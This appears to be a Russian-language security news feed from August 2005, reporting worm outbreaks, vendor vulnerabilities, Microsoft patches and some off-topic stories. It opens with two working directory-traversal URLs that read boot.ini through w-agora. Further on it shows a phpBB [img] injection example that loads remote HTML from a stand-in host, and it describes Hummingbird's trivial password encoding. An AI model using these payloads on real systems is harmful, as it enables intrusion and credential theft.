http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini"
SecurityFocus

18/08/2005 20:30 RSS 3.0 - начало новой версии формата положено
Появился веб-сайт, посвященный разрабатываемой новой спецификации RSS 3.0, составителем и редактором которой является Джонатан Авидан (Jonathan Avidan). Разработчик этой спецификации разбил процесс ее создания на несколько этапов, выделив основные составляющии: RSS 3 Lite, RSS 3 Full, RSS Category Declaration Language (RCDL) и RSS Rating Description Language (RRDL). Для ознакомления на этом веб-сайте представлена начальная основа формата, которая носит название RSS 3 Lite. По мнению создателя, новый формат станет полностью совместимой надстройкой существующего RSS 2.0, но возьмет некоторые функциональные особенности из RSS 0.9x. Сайт создан с целью обсуждения создания нового формата, автор спецификации, обещает выслушать все мнения высказываемые в ходе обсуждения новой спецификации на форуме сайте, и в случае целесобразности предложений, учесть их и включить в конечную версию спецификации.
RSS 3.0

18/08/2005 03:30 В Интернете разгорелась самая настоящая война вирусов
Ранее мы уже сообщали о появление интернет-червей, использующих недавно закрытую компанией Microsoft уязвимость в Plug'n'Play службе. И вот, с началом новой рабочей недели, большое количество компьютеров, подключилось к Интернету, даже не представляя, что их компьютеры, благодаря незакрытой уязвимости, станут полигоном для размножения и противоборства различных семейств интернет-червей(Zotob, IRCBot, RBot, SDBot и Bozori). Жертвами вирусов стали такие крупные организации как CNN, ABCNews, New York Times и другие не менее авторитетные и крупные компании. Невольно возникает вопрос о защищенности сетей таких крупных организаций, на безопасность, которых тратятся немалые деньги, а в результате - крупные сбои в компьютерных сетях. Обновление безопасности было выпущено практически неделю назад, куда смотрят системные администраторы этих компаний!?
Учитывая создавшуюся панику можно было придать интерес и ее рассмотрению, но пусть этим занимаются "желтая" пресса. Мы хотели, акцентрировать ваше внимание на следующем интересном эпизоде этой начавшейся вирусной эпидемии:
На выходных, антивирусная компания F-Secure зафиксировала появление первого интернет-червя Zotob.A, использующего уже упомянутую уязвимость. Несколько позднее появилась его модификация Zotob.B с увеличенными функциональными способностями. Это семейство интернет-червей и расползлось по Интернету, но буквально сразу появляется новое семейство вирусов IRCBot.es/.et/.ex, которое тоже использует уязвимость в Plug'n'Play службе, но кроме этого производит удаление из ситемы вирусов семейства Zotob.A-B. Проходит еще некоторое время и в Интернете появляется еще один вид червей RBot.yn и SDBot.adb, использующих все ту же уязвимость. Но и их появление не осталось незамеченным, спустя пару часов появляется новое семейство вирусов Bozori.A-B, которое не просто заражает систему через уязвимость в Plug'n'Play службе, но и удаляет из нее вирусы RBot.yn, SDBot.adb и Zotob.A-B.
Недавно появилась новая модификация вируса Zotob.C, какое семейство или новый вирус прийдет с целью его уничтожения из системы, пока неизвестно. Будем надеяться, что эпидемия закончится также быстро как и началась - как только системный администраторы, установят обновление безопасности от Microsoft и очистят зараженные компьютеры от "воинствующих червей".
uinC.ru

18/08/2005 00:52 Получение паролей от Novell GroupWise
Эд Рид(Ed Reed) сообщил об обнаружение уязвимости в системе Novell GroupWise 5.x/6.x. Уязвимость заключается в небезопасном хранение имен пользователей и паролей в памяти процесса. Благодаря использованию этой уязвимости, злоумышленник, имеющий доступ к уязвимой системе, может с помощью специальных утилит получить дамп памяти процесса и обнаружить в нем пару логин/пароль текущего залогиненного пользователя в "чистом" виде. Уязвимость устранена в Novell GroupWise 7.x.
Novell

17/08/2005 23:44 Слабое шифрование пароля в Hummingbird FTP
В FTP-клиенте Hummingbird Connectivity 10.x(возможно и в предыдущих версиях) обнаружена слабая система шифрования паролей, хранимых в файлах профиля с расширением *.hfs. При шифрование сохраненных паролей используется очень простой алгоритм шифрования: к ASCII коду каждого символа пароля прибавляется число 125(0x7d).
security.nnov.ru

17/08/2005 21:34 Переполнение буфера в WinFtp Server
Донато Ферранте(Donato Ferrante) обнаружил уязвимость в FTP-сервере WinFtp Server 1.6.8, использование которой может привести к переполнению буфера программы. Уязвимость заключается в недостаточной проверке размера данных, помещаемых в буфер программы, при активной функции "Log To Screen".
Описание

17/08/2005 20:17 Множественные уязвимости в Xerox Document Centre
Обнаружено несколько уязвимостей в Xerox Document Centre, которые позволяют злоумышленнику:
- обойти в веб-сервере Xerox MicroServer аутентификацию пользователя;
- при обработке специально сформированного HTTP запроса, вызвать "отказ от обслуживания" и получить доступ к некоторым файлам сервера;
- недостаточная проверка входящих данных веб-сервером позволяет выполнить произвольный HTML код или скрипт на компьютере пользователя, просматривающего специально сформированный URL.
Для закрытия обнаруженных уязвимостей необходимо установить обновление, доступное на веб-сайте производителя.
Secunia

17/08/2005 19:07 Уязвимость в Linksys WRT54GS
Стив Шерф (Steve Scherf) сообщил о наличие уязвимости в прошивке беспроводного маршрутизатора "Linksys WRT54GS Wireless-G Broadband Router with SpeedBooster", позволяющей злоумышленнику обойти систему безопасности. Уязвимость заключается в возможности подключения к маршрутизатору клиентов, не использующих шифрование, даже при включенной опции WPA Personal/TKIP. Уязвимым являются маршрутизаторы Linksys WRT54GS с "заводскими" настройками и прошивкой 4.50.6. Уязвимость ликвидирована в прошивке 4.70.6, доступной на веб-сайте поризводителя.
Linksys

17/08/2005 14:35 Множественные уязвимости в Legato NetWorker
В программном комплексе резервного копирования Legato NetWorker 6.x/7.x обнаружен ряд опасных уязвимостей, позволяющих злоумышленнику произвести DoS-атаку, получить доступ к конфиденциальной информации или обойти главную систему безопасности.
1) Ошибка в AUTH_UNIX аутентификации для службы RPC позволяет обойти защиту в модулях nwadmin, nsradmin и nsrports, используя вымышленное имя пользователя, а также в модулях recover и nsrececd, используя несуществующий UID.
2) Ошибка в аутентификации службы баз данных, может быть использована для получения администраторских привилегий путем посылки специально сформированных идентификационных данных.
3) Ошибки в portmapper (lgtomapper), разрешающие обращение к модулям pmap_set и pmap_unset, позволяют зарегистрировать неопределенные RPC службы, чем вызвать "отказ от обслуживания" (произвести DoS атаку).
На веб-сайте производителя доступны патчи, ликвидирующие эти уязвимости в LGTpa74792, LGTpa78968 и LGTpa78969 7.1.3/7.2.
Legato NetWorker

16/08/2005 22:02 Windows и Linux теперь на Sony Playstation
Усилиями энтузиастов, неравнодушных к игровой приставке Sony PlayStation Portable, стало возможным запустить на ней ОС MS Windows 95 и DLX Linux. Это стало возможно после успешно проведенного портирования эмулятора x86 процессора, Bochs. В результате тестирования ОС Windows 95 загружалась около 10 минут, после загрузки работа в Windows стала более ли менее управляемой, стало возможным открыть "Мой компьютер" с виртуальным жестким диском и даже поиграть в "Стандартные" игры, входящие в состав ОС. Управление мышкой в Windows было очень неудобным и вызывало некоторые проблемы. Запуск DLX Linux прошел более быстро, но управлять им без клавиатуры несколько проблематично. На сайте "хакеров", которые произвели портирование Bochs, вы сможете ознакомиться со скриншотами, сделанными во время тестирования и более подробно узнать о процессе портирования и установке ОС, а предоставленные файлы помогут вам, при желание, повторить их опыт.
hacker.co.il

16/08/2005 21:20 Переполнение буфера в продуктах Adobe Acrobat
Обнаружена критическая уязвимость в программе Adobe Acrobat Reader 5.1/6.0-6.0.3/ 7.0-7.0.2 и Adobe Acrobat 5.0-5.0.5/6.0-6.0.3/7.0-7.0.2. Уязвимыми являются перечисленные версии программ для следующих платформ: Windows, Mac OS, Linux и Solaris. При использование найденной уязвимости злоумышленник может вызвать переполнение буфера специально сформированным файлом и выполнить произвольный программный код с правами текущего пользователя. Компания Adobe рекомендует всем пользователям уязвимых версий Adobe Acrobat установить обновление доступное на сайте разработчиков.
Adobe

16/08/2005 16:26 Обнаружена уязвимость в форуме Discuz
В довольно редком, но все-таки используемом "движке" форума Discuz! обнаружена уязвимость. Уязвимость заключается в недостаточной проверке расширений, что позволяет загрузить на сервер произвольный файл, используя файл с несколькими расширениями, например: "attach.php.php.php.php.rar". В результате чего злоумышленник удаленно может выполнить произвольный команды на сервере с привилегиями HTTPD процесса. Подверженными этой уязвимости оказался Discuz! 4.0.0 rc4 и предыдущие версии.
SecurityFocus

16/08/2005 15:50 Apple выпустила новый Security Update
Компания Apple выпустила обновление безопасности 2005-007, которое устраняет ряд уязвимостей, обнаруженных в компонентах ОС OS X 10.3.9 и 10.4.2.
Список вносимых этим обновлением изменений:
- закрыто достаточно много различных уязвимостей в Apache 2;
- ликвидирован ряд уязвимостей в AppKit, связанных с обработкой текстовых фалов и возможностью создания нового аккаунта пользователя;
- решены проблемы с аутентификацией Bluetooth устройств;
- в CoreFoundation исправлено несколько уязвимостей, одна из которых вызывает переполнение буфера;
- устранены проблемы в CUPS, возникающих в обработке очереди печати;
- ликвидирован ряд опасных уязвимостей в Directory Services, которые могли привести к возможности поднятия привилегий и выполнению произвольного программного кода;
- решены проблемы с чтением защищенных полей ввода модулем VoiceOver, входящим в состав HItoolbox;
- устранен ряд опасных уязвимостей в Kerberos, приводящих к возможности выполнения произвольного программного кода;
- решены проблемы с Fast User Switching, которые позволяли пользователю, знающему пароль от двух аккаунтов, зайти под третьим, не зная пароля;
- устранены проблемы с утилитами ping и traceroute, которые вызывали переполнение буфера;
- ликвидированы уязвимости в servermgrd и servermgr_ipfilter;
- устранена проблема переполнеия буфера в X11;
- внесен ряд незначительных обновлений в почтовой программе Mail, в веб-браузере Safari, в QuartzComposerScreenSaver, в WebKit и в Weblog Server;
- обновлены версии ряда продуктов сторонних производителей, такие как: MySQL до 4.0.24, OpenSSL до 0.9.7g, zlib до 1.2.3, SquirrelMail до 1.4.5.
Эксперты оценивают это обновление как одно из самых обширных, из выпущенных за последнее время. Данное обновление безопасности доступно непосредствено на сайте компании Apple или через Software Updater. Оценивая масштабы и серьезность обновлений, установить этот пакет обновления рекомендуется всем пользователям "макинтошей".
Apple

15/08/2005 18:46 Убийство "главного спамера страны" раскрыто
По сообщению "Московского комсомольца", в воскресенье сыщиками МУРа и оперативниками ОВД "Тверской" была задержена группа подростков, по подозрению в их причастности к убийству "главного спамера России", руководителя интернет-проекта по быстрому обучению английскому языку. В группу, которой руководил 27 летний мужчина входили два юноши 17 и 18 лет, а также 15 летняя девушка Вика. По предположению сыщиков, компания подростков, ночью, по водосточной трубе, разбив окно, проникла в квартиру Вардана Кушнира, расположенную на вотором этаже дома по Садовой-Каретной улице. Затем заметив хозяина, ударом бейсбольной биты оглушили его, псоле чего забили его до смерти. Задерженные не отрицают свою причастность к убийству, но и не согласны с версией следователей, по их версии они не проникали в квартиру Куршнира через окно, а были приглашены на вечерние посиделки самим пострадавшим. Во время посиделок, хозяин под действием алкогольного опьянения стал приставать к 15-летней девушке Вике, когда же подростки предприняли попытку урезонить хозяина, тот схватил нож и набросился на них. Молодые люди с целью самообороны разбили об его голову пустую бутылку, после чего нанесли несколько ударов бейсбольной битой. Напомним, что в соотвестствие со статьей 105 п.2 УК РФ предусмотрено наказание в виде "лишения свободы на срок от восьми до двадцати лет либо смертной казнью или пожизненным лишением свободы".
Московский комсомолец

15/08/2005 15:52 NTT представит 3х-мерный браузер уже этой осенью
В октябре этого года японская фирма NTT планирует выпустить принципиально новый браузер SpaceBrowser, в котором серфинг по Сети осуществляется в трех измерениях. Все страницы и веб-сайты в этом браузер будут помещатся в одну из выбранных пользователем трехмерную среду. По заявлению разработчиков, такая среда более привычна и естественна для человека, ведь мозг привык работать именно с трехмерными объектами. NTT SpaceBrowser является надстройкой для Internet Explorer и будет поддерживать работу на платформе MS Windows XP/2000.
Вебпланета

15/08/2005 15:15 Самонастраивающийся firewall от компании Stingray
Компания Stingray объявила о выпуске аппаратного брандмауэра в комплекте с Avast Anti-Virus. В отличие от большинства своих аналогов, Intelligent Hardware Firewall не требует никакой настройки со стороны пользователя, применение и определение актуальности применения различных правил происходит при помощи специально разработанного алгоритма реагирования, набор применяемых правил изменяется в режиме реального времени в зависимости от характера предполагаемой угрозы. Устройство подключается в разрыв между Cable/ADSL модемом и компьютером/роутером, используя Ethernet. Цена этого брандмауэра относительно невелика - около $80.
Обзор на TechAbsorbed

14/08/2005 15:40 Появление нового интернет-червя Zotob
Антивирусная компания F-Secure сообщает об обнаружение нового интернет-червя Zotob.A. Появившейся "червь" является клоном известного ранее интернет-червя Mytob, отличительной же особенностью нового "червя" является способ проникновения на удаленый компьютер, в данном случае применяется недавно закрытая уязвимость в службе Plug and Play (MS05-039). После заражения компьютера "червь" копирует себя в каталог %SYSTEM% под именем "botzor.exe" и делает соответствующую запись в системном реестре для последующего своего автозапуска.
Zotob.A

14/08/2005 02:23 Переполнение буфера в Novell eDirectory iMonitor для Windows
Питер Винтер-Смит (Peter Winter-Smith) из NGSSoftware обнаружил опасную уязвимость в Novell eDirectory 8.7. В основе уязвимости лежит переполнение буфера процесса "dhost.exe", что приводит к возможности удалено выполнить произвольный программный код на уязвимом сервере с привилегиями локального пользователя. Уязвимость устранена в Novell eDirectory Server 8.7.3 (ID NOVL103077), загрузить эту версию программы можно с сайта производителя.
Эксплоит

13/08/2005 23:30 Получение паролей от файлов Whisper32
Обнаружена уязвимость в программе хранения паролей Whisper32 1.16(и возможно предыдущих версиях). Уязвимость заключается в хранение пароля от зашифрованного WSP файла в открытом ввиде в памяти процесса. Для использования этой уязвимости злоумышленнику необходимо загрузить WSP файл в программу Whisper32 и после появления диалогового окна ввода пароля, с помощью специальных утилит получить дамп памяти процесса Whisper32, в котором далее аналитическим путем обнаружить необходимый для ввода пароль от WSP файла.
Описание

13/08/2005 16:30 Уязвимость в AWStats
Обнаружена опасная уязвимость в системе анализа лог-файлов веб-сервера и отображения статистики AWStats 6.4 (и предыдущих версиях). Уязвимость заключается в недостаточной проверки параметра функции eval(), что позволяет атакующему выполнить произвольный perl-код. Т.к. уязвимость существует только при использование хотя бы одного URLPlugin, для обеспечения временной безопасности можно отключить используемые плагины. Уязвимость ликвидирована в AWStats 6.5, доступной на сайте разработчика.
iDEFENSE Security

13/08/2005 00:32 Опасная уязвимость в Veritas Backup Exec
В программе резервного копирования Veritas Backup Exec для Windows серверов обнаружена опасная уязвимость. Уязвимым является модуль "Remote Agent", найденная в нем уязвимость позволяет злоумышленнику получить произвольный файл с удаленого сервера, используя сетевое соединения с сервером через 10000 TCP порт. Для устранения этой уязвимости разработчик этой программы рекомендует блокировать доступ к этому порту из вне, и оставить возможность подключения только доверенным адресам. Уязвимость обнаружена в Veritas Software Backup Exec 8.0/8.5/8.6/9.0/9.1/10.0(rev. 5520/5484 SP1/5484).
Эксплоит

12/08/2005 22:59 Уязвимость в phpBB 2.0.17
Обнаруженная уязвимость в "движке" форума phpBB 2.0.17 (и предыдущих версиях) позволяет злоумышленнику включать в сообщение форума произвольные скрипты и HTML код, причиной этого стала некорректная обработка содержимого BBCode "[IMG]". Т.е. для примера, если отправить сообщение, используя следующий код: "[img]http://theremotehost.com/exploit.jpg[/img]", где "exploit.jpg" будет занимать переименованный любой HTML-файл на другом сервере, при просмотре страницы содержащей это сообщения, этот файл будет выполнен на компьютере пользователя.
SecurityFocus

12/08/2005 21:46 Множественные уязвимости в Kaspersky Anti-Virus для Linux серверов
Доктор Питер Бейрингер(Peter Bieringer) сообщил сразу о двух локальных уязвимостях, которым подвержен антивирус Kaspersky Anti-Virus 5.5-2 для Linux File Servers.
Первая уязвимость заключается в небезопасной записи файлов статистики(логов) модулем "kavmonitor". Благодаря этой уязвимости злоумышленник может удалить или изменить содержимое этих файлов, что может быть использовано при "заметании следов" своей активности.
Вторая уязвимость обнаружена в небезопасном хранении файлов ключей программы, что позволяет злоумышленнику удалить или изменить эти файлы используя ошибки при запуске модуля программы "keepup2date", отвечающего за поддержку обновления сигнатур этих файлов.
В версии Kaspersky Anti-Virus 5.5-3 для Linux File Servers, перечисленные уязвимости ликвидированы.
Эксплоит
SecurityFocus

12/08/2005 17:57 Выход Mandriva Linux Beta 2
Вышла вторая бета-версия Mandriva Linux, дружественной ОС Linux, удобной для использования как на серверах, так и на домашних/офисных компьютерах. В этом релизе внесены следующие изменения:
+ решены некоторые проблемы в работе с модулем x86_64 initrd;
+ исправлено большое количество уязвимостей, обнаруженных в php модулях;
+ исправлена работа однопользовательского режима в initscripts;
+ устранены некоторые проблемы при работе drakxtool;
+ DrakX 1.1058 (acpi=on для всех моделей bios, а не только в ноутбуках);
+ kernel 2.6.12-8mdk (2.6.12.3).
Release notes

12/08/2005 17:14 Всем любителям пива посвящается
Японские ученые доказали, что пиво, как и более крепкие алкогольные напитки, защищает организм от радиоактивного излучения. Такой вывод был сделан в ходе экспериментов, проводившихся специалистами из Института лучевой медицины в городе Тибе, сообщает ИТАР-ТАСС.
Выяснилось, что одной полулитровой бутылки светлого пива достаточно, чтобы снизить число хромосомных повреждений на 34%. Эти повреждения возникают в хромосомах под воздействием рентгеновских лучей или тяжелых частиц, например, ионов водорода.
Ученые считают, что этот эффект достигается благодаря сочетанию с алкоголем содержащихся в напитке биологически активных соединений, таких как псевдоуридин, мелатонин и глицин-бетаин. Известно, что свободные радикалы, которые при облучении приводят к генетическим нарушениям, поглощаются спиртом. Следовательно, безалкогольное пиво не может защитить от радиоактивного излучения.
Ранее о целебных свойствах пива заявили ученые из генуэзского Института опухолей. При изучении состава напитка они обнаружили большое количество молекул, препятствующих развитию злокачественных образований в человеческом организме. Причем наиболее полезным в этом отношении является пиво, имеющее более горький вкус и дающее более плотную пену.
Из собственных эмпирических(практических) исследований команды uinC хочется добавить, что при определенном количестве пива, выпиваемого в течении рабочего дня, у компьютерщиков занятых интеллектуальным трудом, наблюдается повышение жизненого тонуса, что способствует более результативной работе.
Компьюлента

12/08/2005 16:15 Переполнение буфера в Linux Kernel XDR
Флориан Веймер (Florian Weimer) сообщил об обнаружение уязвимости в ядре Linux, которая может быть использована злоумышленником для проведения DoS-атаки. Уязвимость обнаружена в ошибочной обработке XDR массивов при кодировке/декодировке данных функцией "xdr_xcode_array2()". Использование данной уязвимости может привести к переполнению буфера при посылке специально сформированных XDR данных через nfsacl протокол. Уязвимость обнаружена в Linux Kernel 2.6.12( возможно и предыдущих версиях), ликвидирована в Linux Kernel 2.6.13-rc1 и последующих версиях.
Secunia

12/08/2005 16:00 Первый червь для мобильных телефонов воскрес на Олимпийском стадионе в Хельсинках
В Хельсинках (столица Финляндии), где в настоящее время проходит чемпионат мира по легкой атлетике, зафиксирована эпидемия сетевого червя Cabir.
Вирус Cabir, поражающий коммуникаторы под управлением операционной системы Symbian OS, впервые был обнаружен в июне прошлого года. Вредоносная программа проникает на смартфон под видом утилиты для защиты устройства Caribe Security Manager. После запуска вирус внедряется в систему и активизируется при каждом включении коммуникатора.
Распространяется Cabir посредством беспроволной связи Bluetooth. Несмотря на то, что деструктивных функций в коде вируса пока обнаружено не было, присутствие червя на смартфоне приводит к ускоренному разряду аккумулятора из-за постоянного использования связи Bluetooth. После появления оригинальной версии Cabir были выпущены несколько модификаций вируса, в том числе вариант, распространяющийся в составе мультимедийных сообщений MMS.
Как сообщает Reuters со ссылкой на компанию F-Secure, эпидемия Cabir в Хельсинки вспыхнула на Олимпийском стадионе. Сейчас известно, по крайней мере, о нескольких десятках случаев заражения. Таким образом, Cabir фактически установил рекорд (среди мобильных вирусов) по количеству заражений на единицу площади.
На сегодняшний день Cabir обнаружен в диком виде на территории примерно двадцати стран, в том числе и в России. В целом, отмечают в F-Secure, сейчас известно уже о почти 60 вредоносных программах, поражающих портативные устройства.
Worm.SymbOS.Cabir
Компьюлента

12/08/2005 15:46 Panda GateDefender - теперь со специальной защитой от шпионского ПО и фишинга
Panda GateDefender недавно было усовершенствовано с помощью новых технологий, повышающих его эффективность в борьбе со шпионским ПО, фишингом и любым другим типом вредоносных программ. Эти улучшения доступны пользователям серии 8000 бесплатно.
Для борьбы с угрозой шпионского ПО новая версия Panda GateDefender совмещает три защитных технологии:
- Антивредоносный механизм: кроме технологии сигнатурного обнаружения, он содержит новый модуль фильтрации контента контент-Фильтр, который способен блокировать вредоносные компоненты, которые часто являются точкой входа для шпионских программ, такие как элементы ActiveX, в 6 протоколах.
- Технологии веб-фильтрации: используя технологию Cobion/ISS, распределяющую более 20 миллионов URL по различным категориям, блокируются потенциально опасные веб-страницы, способные содержать шпионские программы.
- Эвристическое сканирование: содержит технологию генетического вирусного сканирования, интегрирующую генетическую корреляцию цифровых сигнатур и глубинное инспектирование кода для обнаружения новых вредоносных программ, которые еще не были опознаны не одной компанией ИТ-безопасности. Это обеспечивает оптимальную защиту от этих и других типов вредоносных программ.
Эффективность GateDefender в обнаружении IT-угроз была недавно сертифицирована престижной лабораторией ICSA Labs.
Из-за растущей угрозы фишинга Panda Software недавно присоединилась к Anti-Phishing Working Group (APWG), специализированной ассоциации, состоящей из основных представителей индустрии IT-безопасности, нацеленной на борьбу с фишингом.
Для борьбы с угрозой фишинга новая версия Panda GateDefender совмещает ряд технологий:
- Специфичные антифишинговые технологии: эти технологии совмещаются последовательно для улучшения эффективности работы и понижения вероятности ложных срабатываний. Среди используемых технологий – веб-фильтрация, анализирующая любые URL в электронных письмам и сравнивающая их с базой мошеннических URL. Также анализируется HTML-код письма для поиска типичных особенностей фишинга, таких как фальсифицированные ссылки и отправители, или изображений, относящихся к мошенническим адресам. Еще одна технология анализирует формат и содержание письма, чтобы с еще большей точностью определить вероятность того, что сообщение является попыткой фишинговой атаки.
- Антиспамовая технология. эта технология содержит четыре сканирующих механизма для последовательного анализа каждого электронного сообщения. Это означает, что она способна обнаруживать и блокировать фишинговые атаки, так как они часто рассылаются массовым способом.
- Основанная на сигнатурах технология обнаружения. эта технология также эффективна против фишинговых атак, использующих уязвимости, которые, например, позволяют подменять адрес, видимый пользователем в браузере при посещении мошеннического сайта.
- Эвристическое сканирование. эта предупреждающая технология способна блокировать изощренные версии фишинга, такие как фарминг, который изменяет hosts-файл на локальном компьютере.
Panda Software

12/08/2005 15:27 Что же все-таки "залатала" Microsoft
Мы уже сообщали ранее об обновлениях, выпущенных корпорацией Microsoft 9 августа, тогда мы посчитали не нужным акцентрировать внимание на обнаруженных уязвимостях по причине отсутствия на тот момент свободно доступных "эксплоитов" в Интернете. Сейчас же, для некоторых, найденных уязвимостей существуют "эксплоиты", наглядно демонстрирующие опасность, которой подвергается компьютер без установленных обновлений. Этим уязвимостям и посвящен этот маленький обзор.
Microsoft Security Bulletin MS05-038
Данный пакет обновлений закрывал 3 обнаруженные уязвимости:
JPEG Image Rendering Memory Corruption Vulnerability
Уязвимость, обнаруженная в повреждении памяти при обработке изображения, дает возможность злоумышленнику удалено выполнить произвольный программный код, на подверженном данной уязвимости, компьютере. Для использования этой уязвимости пользователь должен просмотреть специально сформированное изображение в Intenet Explorer, например, такое изображение может быть послано по электронной почте, или размещено на каком-нибудь веб-сайте и представлено "жертве" в виде ссылки, на которую необходимо зайти, используя Intenet Explorer.
Эксплоит 1
Эксплоит 2
Web Folder Behaviors Cross-Domain Vulnerability
Уязвимость, обнаруженная в возможности просматривать папки, используя веб-оформление, в результате использования этой уязвимости злоумышленник с помощью специально созданной веб-страницы может выполнить произвольный программный код на компьютере пользователя и получить полный контроль над уязвимой системой.
COM Object Instantiation Memory Corruption Vulnerability
Уязвимость, обнаруженная в системе регистрации COM объекта, не предназначенного для использования в Internet Explorer, в результате чего злоумышленник с помощью специально созданной веб-страницы может выполнить произвольный код на удаленой системе.
Эксплоит 1
Эксплоит 2
Microsoft Security Bulletin MS05-039
Обновление, закрывающие уязвимость обнаруженную в службе установки нового оборудования Plug and Play. Поскольку эта служба доступна извне с помощью именованных каналов, удаленный пользователь может подключиться к уязвимой системе и выполнить произвольный код с привилегиями Local System.
Эксплоит
Microsoft Security Bulletin MS05-040
Обновление, закрывающие уязвимость, обнаруженную в службе Телефонии Microsoft Windows, а именно в Telephony Application Programming Interface (TAPI) содержащего ошибку, приводящую к переполнению буфера, в результате чего авторизированный удаленый пользователь может выполнить произвольный программный код на уязвимой системе.
Microsoft Security Bulletin MS05-041
Обновление, закрывает уязвимость, обнаруженную в службе Remote Desktop Protocol (RDP) и позволяющую злоумышленнику произвести DoS-атаку, посылками специально сформированных сообщений на удаленую систему, используя RDP протокол, в результате чего использование этой уязвимости приводит к перезагрузке системы.
Эксплоит
Microsoft Security Bulletin MS05-042
Пакет обновлений, закрывающий сразу 2 уязвимости:
Kerberos Vulnerability
Уязвимость, связанная с ошибкой обработки определенных Kerberos сообщений и позволяющей злоумышленнику произвести DoS-атаку, приводящей к остановке Active Directory.
PKINIT Vulnerability
Уязвимость, возникающая в результате обработки PKINIT транзакций и позволяющая злоумышленнику "спуффинг" соединения клиент-сервер, при использовании аутентификации смарт-картами.
Microsoft Security Bulletin MS05-043
Обновление, закрывающие уязвимость в службе "Очереди печати", заключающейся в отсутствие проверки длины буфера в процессе spoolsv.exe. Злоумышленник, послав службе печати специально сформированный пакет, может вызвать переполнение буфера и выполнить произвольный код на уязвимой системе.
Здесь представлены "эксплоиты" далеко не ко всем уязвимостям, по мере появления новых эксплоитов в Интернете, этот материал будет дополнен.
Microsoft

12/08/2005 13:10 У "Скай Линк" появились новые тарифы для мобильных интернетчиков
Компания "Скай Линк" представляет новую группу федеральных тарифов "On-line", полностью ориентированную на активных пользователей мобильного интернета. Тарифная группа "On-line" уже ведена в Санкт-Петербурге, Новосибирске, Омске, Краснодаре. Группа "On-line", созданная для удовлетворения растущего спроса на мобильный Интернет и передачу данных, состоит из четырех тарифов. Во всех тарифах в абонентскую плату включен значительный объем интернет-трафика:
"Оn-line Федеральный" (50 Mb включено) - $15;
"On-line 150" (150 Mb включено) - $30;
"On-line 300" (300 Mb включено) - $45;
"On-line PROFI" (1000Mb включено) - $70.
Голосовые вызовы и другие дополнительные услуги в тарифах "On-line" оплачиваются сверх абонентской платы. Объем включенного интернет-трафика и базовая структура тарифной группы едины для всех регионов, где сеть "Скай Линк" работает в режиме коммерческой эксплуатации. Указаны примерные цены без учета НДС, реальная же цена и набор тарифов может быть различным в зависимости от рыночной ситуации региона.
SKYLink

12/08/2005 12:50 Новая линейка сетевых накопителей от Logitech
Компания Logitech анонсировала выпуск сразу двух серий новых сетевых накопителей, каждая из которых будет состоять из трех NAS-моделей вместимостью 160, 250 и 300 Гбайт.
Первая серия, "NetPocket LHD-LANG", имеет поддержку 100/1000 Gigabit Ethernet и выйдет в продажу в начале сентября этого года. Три модели в черных корпусах построены на базе процессоров Motorola MPC8241 с тактовой частотой 266 МГц и оснащены оперативной памятью объемом 64 Мбайт.
Вторая серия, "NetPocket LHD-LANE", имеет поддержку 100 Ethernet и выйдет в продажу в конце августа этого года. Эти три модели в белых корпусах построены на базе процессоров Intel IXP420 с тактовой частотой 266 МГц и оснащены оперативной памятью объемом 32 Мбайт.
Следует отметить, что на всех новинках установлены жесткие диски со скоростью вращения шпинделя 7200 оборотов в минуту, оперативная система Synology Diskstation и три порта USB 2.0.
Новые накопители обладают широким спектром функциональных возможностей, среди которых создание запасных копий всех обновляемых файлов, способность восстановления поврежденной информации в случае какого-либо сбоя, а также просмотр картинок в Internet Explorer в режиме слайд-шоу. Кроме этого, накопители серии NetPocket LHD-LANG дополнительно снабжены поддержкой технологии Jumbo Frame, которая обеспечивает возможность передачи данных большими пакетами объемом 4.5 Кбайт.
Цена на новинки, габаритные размеры которых составляют 60 х 213 х 181 мм, а вес равен 1.3 кг, будет колебаться от $350 до $400 в зависимости от технических характеристик каждой конкретной модели.
По материалам Ferra.ru

11/08/2005 14:19 Запущена поисковая система по исходным текстам открытых программ
После нескольких лет разработки запущен сайт "csourcesearch.net", представляющий собой поисковую систему, с возможностью поиска по именам функций, классов, структур, пакетов, словам в комментариях и т.д. в исходных текстах открытых программ на Си/Си++ (проиндексировано более 100 миллионов строк кода). Такая система поиска отлично подходит для поиска типовых решений.
Напомним, что ранее несколько похожии проекты уже появлялись на просторах Интернета, например известный проект "koders.com", который осуществляет поиск по исходным текстам программ в более 225 миллионах строк кода, на 30 языках программирования (таких как, С/С++, Perl, PHP, Python. Ruby, SQL, Java, Tcl и др.).
csourcesearch.net
koders.com
Источник

10/08/2005 23:41 Уязвимость в WordPress 1.5.1.3 (и предыдущих версиях)
В WordPress 1.5.1.3(и ниже), средстве управления электронными журналами (блогами), обнаружена уязвимость в обработке cookie, позволяющая атакующему удалено выполнить произвольный код. Уязвимой системой является только при активированном параметре "register_globals" в настройках PHP. Данная уязвимость исправлена в новой версии WordPress 1.5.1.4.
Эксплоит

10/08/2005 13:30 "Но сам факт... человек, убитый в глубине, умер по-настоящему!"
По сообщению Reuters, 28-летний Лии после 50 часов непрерывной игры в "шутер" был обнаружен мертвым в одном из компьютерных клубов города Таегу, Южная Корея. По заявлению полиции, результатом смерти стало истощение организма.
Сразу вспомнилась цитата из книги "Фальшивые зеркала" Сергея Лукьяненко:
"...Это ведь очень сладкая иллюзия, глубина. Слаще героина. Ты будешь жать на кнопку "выход", но не наберешь никакой команды наяву. И знаешь почему? Сделать это - признать нереальность глубины. Крыса, которой вживили в центр удовольствия электроды, не станет перекусывать провода. Она предпочтет давить на педаль и умереть от истощения. Люди ничем не лучше крыс...".
Похоже, описанное Сергеем Лукьяненко в его книге, становится реальностью!
Официальный веб-сайт Сергея Лукьяненко

10/08/2005 10:11 Microsoft опубликовало Windows Vista SDK
В понедельник компания Microsoft заявила о публикации в MSDN набора средств разработки(SDK). Выпущенный WinFX SDK включает в себя: сопроводительную и справочную документацию, примеры исходных кодов(с использованием языков программирования: Visual Basic, C# и C++) и различные вспомогательные утилиты для разработчиков программного обеспечения под новую платформу WinFX API, которая станет основой следующего поколения операцинных систем Microsoft. Документация включает в себя описание возможностей использования .NET Framework 2.0, Windows Presentation Foundation (известного под кодовым названием "Avalon") и Windows Communications Foundation (кодовое имя - "Indigo").
Документация доступна как в онлайн режиме на сайте MSDN, так и в виде программного комплекса.

9/08/2005 22:30 Выход обещанных обновлений безопасности от Microsoft
